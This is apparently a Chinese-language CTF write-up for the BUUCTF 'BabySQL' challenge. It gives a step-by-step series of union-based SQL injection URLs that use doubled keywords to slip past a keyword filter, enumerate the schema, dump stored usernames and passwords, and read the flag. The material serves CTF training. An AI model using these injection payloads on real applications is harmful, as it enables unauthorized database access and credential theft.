BUUCTF-[极客大挑战 2019]BabySQL 1

题目考察了字符绕过,注释符绕过,sql双写绕过

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 order by 3%23&password=admin   .

 

可以看到or和by关键字被过滤

尝试双写绕过

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 oorrder bbyy 3%23&password=admin

 

 回显正常,说明有3列

同理

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 union select 1,2,3%23&password=admin

 

 这里也过滤了union select关键字

双写绕过

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 uniunionon selselectect 1,2,3%23&password=admin

 

 http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,3%23&password=admin

 

 回显2,3

走流程暴库,爆表,爆列,爆数据

暴库

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,group_concat(schema_name) frorom infoorrmation_schema.schemata%23&password=admin

 

 爆表

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,group_concat(table_name) frorom infoorrmation_schema.tables whwhereere table_schema='geek'%23&password=admin

 

 爆列

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin' anandd 1=2 uniunionon selselectect 1,2,group_concat(column_name) frorom infoorrmation_schema.columns whwhereere table_name='geekuser'%23&password=admin

爆数据

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) frorom geek.geekuser%23&password=admin

 

 发现flag不在表中,那就换个表m发现也不是,草(一种植物)

最后在ctf库中找到flag

http://7738142d-0bba-4e03-b3a6-ff994b997fe2.node3.buuoj.cn/check.php?username=admin%27 anandd 1=2 uniunionon selselectect 1,2,flag frorom ctf.Flag%23&password=admin

 

posted @ 2020-12-19 19:54  !rbash  阅读(144)  评论(0编辑  收藏  举报